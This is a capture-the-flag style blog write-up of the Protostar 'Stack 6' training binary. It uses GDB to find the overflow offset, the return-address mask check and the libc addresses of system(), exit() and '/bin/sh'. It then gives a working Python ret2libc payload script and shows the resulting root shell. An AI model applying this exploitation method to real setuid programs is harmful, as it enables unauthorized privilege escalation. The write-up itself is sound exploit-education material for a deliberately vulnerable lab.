B2B - Protostar, Stack6 (x86)

Introduction:

B2B is a series I have forced upon myself to make sure my basics are covered when it comes to exploitation. After passing my OSCE, I took a little break from exploitation to focus on a few work aspects, but now I am hungry for more lower level nonsense.

This series will focus mainly on exploitation challenges which cover various techniques. The first of these are the stack overflow challenges within the Protostar image from “exploit education” found here. I gave myself two main rules to stick to whilst working through all these challenges.

1) Don’t read the C source code for each challenge, only the hints section if required

2) Don’t read other people’s write-ups for these challenges unless I have already finished the challenge and want to see other routes to further my interest

Stack 6

The seventh challenge of Protostar is “Stack 6”. I approached each challenge with a similar set of steps, so each post will likely follow a similar template(ish): initial running, inspecting the disassembly of the binary and some other specific steps in between, before finally crafting a payload and owning the process.

Our initial use of the program identified the following:

$ ./stack6
input path please: test
got path test

The program simply appears to take a single input, presumably does something with it in the background and then prints some output based on the value that was specified. In this case, the binary took the string “test” as its “input path”, and printed “got path test”. This is a different set of output compared to our previous challenges, so it looks like we might have a new challenge on our hands.

Similar to the last challenge, I started this one off by looking at the hints. I knew it would be another stack based buffer overflow, however I was more curious to see what direction they had decided to go in since we have now done an overflow with our own shellcode.

The hints for this challenge are:

So from the hints alone, we can see that we have a limit on our return address, which we should be able to identify when disassembling the binary, and that we can attempt to exploit the vulnerability with ROP or ret2libc. This either means the stack has been marked non-executable (NX, the Linux counterpart of DEP) or the binary has been designed to prevent us from jumping to shellcode within our buffer (emulating a non-executable stack or similar).

A quick note about ret2libc attacks: IppSec has an amazing video focusing on the HackTheBox target ‘October’, which is a pretty old box. This, if I remember right, had a ret2libc overflow for its priv esc route and the video was flawless. Highly recommend checking that out for a much better explanation than I can give. However, for the sake of my own knowledge and as a refresher, I will jot down a few points about ret2libc to help cover the “why” and “what” of the technique.

Now, back to the task at hand. As usual, I fired up the binary in GDB and checked out its contents. First I inspected the functions:

(gdb) info functions
All defined functions:

File stack6/stack6.c:
void getpath(void);
int main(int, char **);

This time around we have a main function, and a getpath function. Let’s first check out the main function:

(gdb) disas main
Dump of assembler code for function main:
0x080484fa <main+0>:	push   ebp
0x080484fb <main+1>:	mov    ebp,esp
0x080484fd <main+3>:	and    esp,0xfffffff0
0x08048500 <main+6>:	call   0x8048484 <getpath>
0x08048505 <main+11>:	mov    esp,ebp
0x08048507 <main+13>:	pop    ebp
0x08048508 <main+14>:	ret    
End of assembler dump.

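If we break this short function down, we simply see the following: it sets up a stack frame, aligns the stack to a 16-byte boundary, calls getpath(), then restores the stack and returns.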

As the main function doesn’t appear to do anything but call getpath(), we should disassemble this function and inspect what is happening:

(gdb) disas getpath 
Dump of assembler code for function getpath:
0x08048484 <getpath+0>:	push   ebp
0x08048485 <getpath+1>:	mov    ebp,esp
0x08048487 <getpath+3>:	sub    esp,0x68
0x0804848a <getpath+6>:	mov    eax,0x80485d0
0x0804848f <getpath+11>:	mov    DWORD PTR [esp],eax
0x08048492 <getpath+14>:	call   0x80483c0 <printf@plt>
0x08048497 <getpath+19>:	mov    eax,ds:0x8049720
0x0804849c <getpath+24>:	mov    DWORD PTR [esp],eax
0x0804849f <getpath+27>:	call   0x80483b0 <fflush@plt>
0x080484a4 <getpath+32>:	lea    eax,[ebp-0x4c]
0x080484a7 <getpath+35>:	mov    DWORD PTR [esp],eax
0x080484aa <getpath+38>:	call   0x8048380 <gets@plt>
0x080484af <getpath+43>:	mov    eax,DWORD PTR [ebp+0x4]
0x080484b2 <getpath+46>:	mov    DWORD PTR [ebp-0xc],eax
0x080484b5 <getpath+49>:	mov    eax,DWORD PTR [ebp-0xc]
0x080484b8 <getpath+52>:	and    eax,0xbf000000
0x080484bd <getpath+57>:	cmp    eax,0xbf000000
0x080484c2 <getpath+62>:	jne    0x80484e4 <getpath+96>
0x080484c4 <getpath+64>:	mov    eax,0x80485e4
0x080484c9 <getpath+69>:	mov    edx,DWORD PTR [ebp-0xc]
0x080484cc <getpath+72>:	mov    DWORD PTR [esp+0x4],edx
0x080484d0 <getpath+76>:	mov    DWORD PTR [esp],eax
0x080484d3 <getpath+79>:	call   0x80483c0 <printf@plt>
0x080484d8 <getpath+84>:	mov    DWORD PTR [esp],0x1
0x080484df <getpath+91>:	call   0x80483a0 <_exit@plt>
0x080484e4 <getpath+96>:	mov    eax,0x80485f0
0x080484e9 <getpath+101>:	lea    edx,[ebp-0x4c]
0x080484ec <getpath+104>:	mov    DWORD PTR [esp+0x4],edx
0x080484f0 <getpath+108>:	mov    DWORD PTR [esp],eax
0x080484f3 <getpath+111>:	call   0x80483c0 <printf@plt>
0x080484f8 <getpath+116>:	leave  
0x080484f9 <getpath+117>:	ret    
End of assembler dump.

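This is more like it, lots more seems to be going on here! Let’s break this down to a higher level and see what it looks like:

1) Reserve 0x68 bytes of stack space, print the prompt string at 0x80485d0 and flush the stream stored at 0x8049720 (presumably stdout)

2) Read our input with gets() into the buffer at ebp-0x4c

3) Copy the saved return address from ebp+0x4 into a local variable at ebp-0xc

4) ‘and’ that value with 0xbf000000 and compare the result against 0xbf000000

5) If they match, print the string at 0x80485e4 along with the offending address and call _exit(1)

6) Otherwise, print the string at 0x80485f0 along with our buffer and return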

To start inspecting the memory during the input process, I placed a breakpoint on the call to gets(), stepped over it and entered the string “AAAABBBBCCCC” so I could easily see the characters in the stack:

(gdb) b *getpath+38
Breakpoint 1 at 0x80484aa: file stack6/stack6.c, line 13.
(gdb) r
Starting program: /opt/protostar/bin/stack6 
input path please: 
Breakpoint 1, 0x080484aa in getpath () at stack6/stack6.c:13
13	stack6/stack6.c: No such file or directory.
in stack6/stack6.c
(gdb) ni
AAAABBBBCCCC
15	in stack6/stack6.c
(gdb) x/30wx $esp
0xbffffc30:	0xbffffc4c	0x00000000	0xb7fe1b28	0x00000001
0xbffffc40:	0x00000000	0x00000001	0xb7fff8f8	0x41414141 <-- input starts here
0xbffffc50:	0x42424242	0x43434343	0xbffffc00	0xb7eada75
0xbffffc60:	0xb7fd7ff4	0x080496ec	0xbffffc78	0x0804835c
0xbffffc70:	0xb7ff1040	0x080496ec	0xbffffca8	0x08048539
0xbffffc80:	0xb7fd8304	0xb7fd7ff4	0x08048520	0xbffffca8
0xbffffc90:	0xb7ec6365	0xb7ff1040	0xbffffca8	0x08048505
0xbffffca0:	0x08048520	0x00000000

Now we know our input starts from the address “0xbffffc4c”, we can see where the return address limitation comes into play. The check takes our return address (the EIP overwrite), performs an ‘and’ against the value “0xbf000000” and tests whether the result equals “0xbf000000”. If we ‘and’ our input start address with that value, we get exactly “0xbf000000”, and the same is true for every other address on our stack. Ultimately, this means we can’t overwrite the EIP value with an address on our stack. In short, we can’t just jump to our own shellcode - sadface. Even if the stack is executable (which I haven’t confirmed at this point), we wouldn’t be able to just jump to it and run the code.
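To make the and/cmp pair a bit more concrete, here is a minimal Python sketch of the same test. The function name is_blocked is my own, and the sample addresses are simply values that appear in the GDB output so far; this models the two instructions at getpath+52 and getpath+57, not the original C source.

```python
# Model of the check at getpath+52 (and) and getpath+57 (cmp).
MASK = 0xBF000000

def is_blocked(return_address):
    """Return True if getpath() would reject this return address."""
    return (return_address & MASK) == MASK

# Sample values from the session: start of our buffer, main+11, and a
# 0xb7...... value seen in the stack dump.
for addr in (0xBFFFFC4C, 0x08048505, 0xB7EADA75):
    verdict = "blocked" if is_blocked(addr) else "allowed"
    print("0x%08x %s" % (addr, verdict))
```

Note that the test only cares about the top byte: any address whose top byte has every bit of 0xbf set is rejected, and everything in the 0xbf...... stack region falls into that group.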

We can check that this is the case by gaining control of the process EIP and attempting to return to a position in our buffer to see what happens. By using a long, easily recognisable string as input, we can see the value that overwrites our EIP and causes a crash, giving us our offset:

(gdb) c
Continuing.
got path AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPUUUURRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ

Program received signal SIGSEGV, Segmentation fault.
0x55555555 in ?? ()

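As our EIP was overwritten with “0x55555555”, the program tried to return there and crashed. “0x55” in ASCII is “U”, so we can get our offset with the following logic: “U” is the 21st letter of the alphabet and each of the 20 letters before it takes up four bytes of our input, so 20 * 4 = 80 bytes sit in front of the return address.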
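The same offset calculation can be sketched in Python. This assumes the input was the alphabet with each letter repeated four times; the helper name offset_of is hypothetical and only there for illustration.

```python
import string

# Assumed input: AAAABBBBCCCC...ZZZZ (each letter repeated four times).
pattern = "".join(letter * 4 for letter in string.ascii_uppercase)

def offset_of(eip_value):
    """Map a crashed EIP value such as 0x55555555 back to its offset in the pattern."""
    letter = chr(eip_value & 0xFF)
    return pattern.index(letter * 4)

offset = offset_of(0x55555555)
print(offset)  # 80

# Cross-check against the disassembly: buffer at ebp-0x4c, return address at ebp+0x4.
assert offset == 0x4C + 0x4
```

The disassembly also explains why the echoed string shows “UUUU” where “QQQQ” would be expected: getpath() copies the return address into the local at ebp-0xc, which sits 0x4c - 0xc = 64 bytes into our buffer, before printing it.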

This means we should have control of EIP with the following payload:

python -c 'print "A"*80 + "BBBB"' > /tmp/stack6
(gdb) r < /tmp/stack6
Starting program: /opt/protostar/bin/stack6 < /tmp/stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBAAAAAAAAAAAABBBB

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

Excellent! Now let’s just replace this value with an address within our payload and see what happens (this is where we should trigger the “and/cmp” check):

python -c 'print "A"*80 + "\x54\xfc\xff\xbf"' > /tmp/stack6

If we break on the ‘and’ instruction and inspect our EAX register, we see the following:

(gdb) b *getpath+52
(gdb) i r $eax
	eax            0xbffffc54	-1073742764

At this point, EAX is equal to our return address (in this case, our EIP overwrite).

Now if we step over one more instruction with ‘ni’, we should see our new EAX now equals the restricted return value:

(gdb) ni
0x080484bd	17	in stack6/stack6.c
(gdb) i r $eax
eax            0xbf000000	-1090519040

Continuing from here, we hit our fail condition and the process errors out:

(gdb) c
Continuing.
bzzzt (0xbffffc54)

Program exited with code 01.

Now we have proven that we aren’t able to return into our payload and jump to some user defined shellcode, we know we need a different attack vector. This is where the ‘ret2libc / ROP’ hint becomes relevant.

There are a couple of things we need for a ret2libc attack. Again, if you haven’t done one before, check out the IppSec video or other various write-ups to help piece together the puzzle. Effectively, we want to find the address of system(), a ‘/bin/sh’ string and the address of exit() within the libc library that has been loaded into the process.

Luckily, we can get all the information we require directly from GDB. First off we want to find where the libc library has been mapped into the process:

(gdb) info proc mappings
process 2647
cmdline = '/opt/protostar/bin/stack6'
cwd = '/opt/protostar/bin'
exe = '/opt/protostar/bin/stack6'
Mapped address spaces:

    Start Addr   End Addr       Size     Offset objfile
    0x8048000  0x8049000     0x1000          0        /opt/protostar/bin/stack6
    0x8049000  0x804a000     0x1000          0        /opt/protostar/bin/stack6
    0xb7e96000 0xb7e97000     0x1000          0        
    0xb7e97000 0xb7fd5000   0x13e000          0         /lib/libc-2.11.2.so
    0xb7fd5000 0xb7fd6000     0x1000   0x13e000         /lib/libc-2.11.2.so
    0xb7fd6000 0xb7fd8000     0x2000   0x13e000         /lib/libc-2.11.2.so
    0xb7fd8000 0xb7fd9000     0x1000   0x140000         /lib/libc-2.11.2.so
    0xb7fd9000 0xb7fdc000     0x3000          0        
    0xb7fe0000 0xb7fe2000     0x2000          0        
    0xb7fe2000 0xb7fe3000     0x1000          0           [vdso]
    0xb7fe3000 0xb7ffe000    0x1b000          0         /lib/ld-2.11.2.so
    0xb7ffe000 0xb7fff000     0x1000    0x1a000         /lib/ld-2.11.2.so
    0xb7fff000 0xb8000000     0x1000    0x1b000         /lib/ld-2.11.2.so
    0xbffeb000 0xc0000000    0x15000          0           [stack]

From the above, we can see the base address of libc is “0xb7e97000” and the actual library itself is located in “/lib/libc-2.11.2.so”. Also the return address limitation will not be triggered by a return address in this library as we will not be within the “0xbf000000” - “0xbfffffff” range.

Now we know our base address (which will come in handy shortly), we want to find the addresses of two libc functions, system() and exit(). Again, we can use GDB to find these in the current process:

(gdb) print system
$1 = {<text variable, no debug info>} 0xb7ecffb0 <__libc_system>

(gdb) print exit
$1 = {<text variable, no debug info>} 0xb7ec60c0 <*__GI_exit>

These will make sense if you know how to do ret2libc attacks or have read additional information about them. I am just going to assume you are comfy with it and can continue following along. Our final goal is to find the offset of the string “/bin/sh” within libc. This can be easily done with ‘strings’:

$  strings -a -t x /lib/libc-2.11.2.so | grep /bin/sh
11f3bf /bin/sh

We want to use this offset with the base address to give us the exact location of this string within the process’s memory:

“0xb7e97000” + “0x0011f3bf” = “0xb7fb63bf”

So, we now have the three important addresses we need to complete our ret2libc attack:

system() = 0xb7ecffb0

exit() = 0xb7ec60c0

“/bin/sh” = 0xb7fb63bf
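The base-plus-offset arithmetic is easy to get wrong by hand, so here is a minimal Python sketch of it. The helper names find_string_offset and runtime_address are my own, and the byte search is only a rough stand-in for what ‘strings -a -t x’ piped into grep reports.

```python
def find_string_offset(blob, needle=b"/bin/sh\x00"):
    """Return the file offset of needle inside blob, or -1 if it is absent."""
    return blob.find(needle)

def runtime_address(base, offset):
    """Add a file offset to a mapped base address, wrapped to 32 bits."""
    return (base + offset) & 0xFFFFFFFF

# Values taken from 'info proc mappings' and the 'strings' output.
libc_base = 0xB7E97000
binsh_offset = 0x11F3BF
print("0x%08x" % runtime_address(libc_base, binsh_offset))  # 0xb7fb63bf
```

On the Protostar image, passing the contents of /lib/libc-2.11.2.so (opened in binary mode) to find_string_offset should give the same 0x11f3bf, although that run isn’t shown here.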

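Okay, so now we have our important values, we need to know how our call to system() will look. As this is x86, we need to adhere to the calling convention of a function. A normal caller pushes the arguments onto the stack (last argument first) and then executes the call, which pushes the return address. So on entry, a function expects its return address at the top of the stack with its first argument directly after it. Our payload has to recreate that layout by hand: the address of the function we return into, then the return address for that function, then a pointer to our argument.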

For a ret2libc attack, we want our payload to look like the following:

junk + system() + exit() + "/bin/sh"

Breaking this down, we have our “A” buffer, followed by our EIP overwrite which is the address of system(), followed by the return address that we want to land in after our system() call, in this case exit(). This is finally followed by the address of our system() parameter, which in this case is our “/bin/sh” string located within libc itself.
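As a rough illustration of how those three values get consumed, the sketch below unpacks the twelve bytes that sit at the saved return address and labels each one. The function name simulate_ret is hypothetical; it only models the stack reads described in the breakdown, not real execution.

```python
import struct

def simulate_ret(stack_bytes):
    """Label the three little-endian dwords sitting at the saved return address."""
    eip, return_to, arg0 = struct.unpack("<III", stack_bytes[:12])
    return {
        "eip": eip,              # popped by getpath's ret, so execution lands here
        "return_to": return_to,  # what that function sees as its return address
        "arg0": arg0,            # what that function reads as its first argument
    }

# The three addresses gathered from GDB and the strings output.
tail = struct.pack("<III", 0xB7ECFFB0, 0xB7EC60C0, 0xB7FB63BF)
for name, value in sorted(simulate_ret(tail).items()):
    print("%-9s 0x%08x" % (name, value))

# gets() stops reading at a newline, so none of these bytes may be 0x0a.
assert b"\n" not in tail
```

With these values, system() runs with a pointer to “/bin/sh” as its argument and returns into exit(), so the process shuts down cleanly rather than crashing once the shell closes.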

With our previously calculated values, let’s try out a payload. This is the first stack challenge where I needed a little script to complete the generation of the payload. With various values required, it felt easier in the text editor rather than a one-liner:

stack6.py:

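import struct

def build():
    # Addresses taken from the GDB session above
    libc_base = 0xb7e97000
    binsh_offset = 0x11f3bf

    string_addr = libc_base + binsh_offset
    system_addr = 0xb7ecffb0
    exit_addr = 0xb7ec60c0

    # 80 bytes of filler to reach the saved return address
    padding = 'A' * 80

    # "<I" packs each address as an explicit little-endian 32-bit value
    payload = padding
    payload += struct.pack("<I", system_addr)  # EIP overwrite
    payload += struct.pack("<I", exit_addr)    # return address for system()
    payload += struct.pack("<I", string_addr)  # argument for system()
    print payload

build()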

Now we have our script, let’s try to exploit this overflow with our newly crafted ret2libc payload:

$ python /tmp/stack6.py | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���AAAAAAAAAAAA����`췿c��
$ 

It looks like our shell is instantly exiting like last time. This is expected: the pipe closes stdin as soon as the script finishes, so the new shell reads EOF and exits straight away. To confirm our system call is being executed correctly we can step through the exploit in GDB. If we break on the gets() function, similar to before, and then step through instructions with ‘ni’, we eventually see a call to system() with our argument:

(gdb) 
got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���AAAAAAAAAAAA����`췿c��
23	in stack6/stack6.c
(gdb) 
0x080484f9 in getpath () at stack6/stack6.c:23
23	in stack6/stack6.c
(gdb) ni
__libc_system (line=0xb7fb63bf "/bin/sh") at ../sysdeps/posix/system.c:179
179	../sysdeps/posix/system.c: No such file or directory.
	in ../sysdeps/posix/system.c

Now we can see this is actually being called with our “/bin/sh” argument, let’s try the ‘cat’ trick outside of GDB, similar to the stack5 challenge. Running ‘cat’ after the script keeps stdin open and forwards whatever we type to the shell:

$ (python /tmp/stack6.py; cat) | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���AAAAAAAAAAAA����`췿c��
whoami
root
id
uid=1001(user) gid=1001(user) euid=0(root) groups=0(root),1001(user)

This is awesome! We have now completed a ret2libc challenge, which had a specific limitation on the return address. Not only that, but we wrote a little script to generate the payload, calculated offsets and learnt how to find the base addresses of loaded libraries. Only one more stack challenge left of the series!